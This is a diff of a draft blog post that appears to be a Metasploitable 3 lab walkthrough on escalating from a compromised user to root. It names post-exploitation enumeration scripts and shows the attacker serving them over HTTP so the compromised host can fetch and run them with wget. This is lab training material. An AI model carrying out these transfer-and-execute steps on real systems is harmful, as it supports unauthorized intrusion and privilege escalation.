ricobandy/ricobandy.github.io/_drafts/2020-04-08-metasploitable-3-irc.md

 ### From boba_fett --> root

 In order to gain full root access, further recon is required to find ways in which we can further escalate our current privileges.
-I usually run the post exploitation scripts such as `LinEnum.sh` and `linux-smart-enumeration` script to help automate this stage.
+I usually run the post exploitation scripts such as `LinEnum.sh`, `linux-kernel-exploiter` and `linux-smart-enumeration` script to help automate this stage.
 First, I need to transfer these scripts to the compromised server and executed them.
-I will setup a webserver on the attacker machine and use wget to download the files to a location so i can execute them
+I will setup a webserver on the attacker machine and use wget to download the files to a location so i can execute them.

 ```
 root@cyb3r:/opt/LinEnum# python -m SimpleHTTPServer 80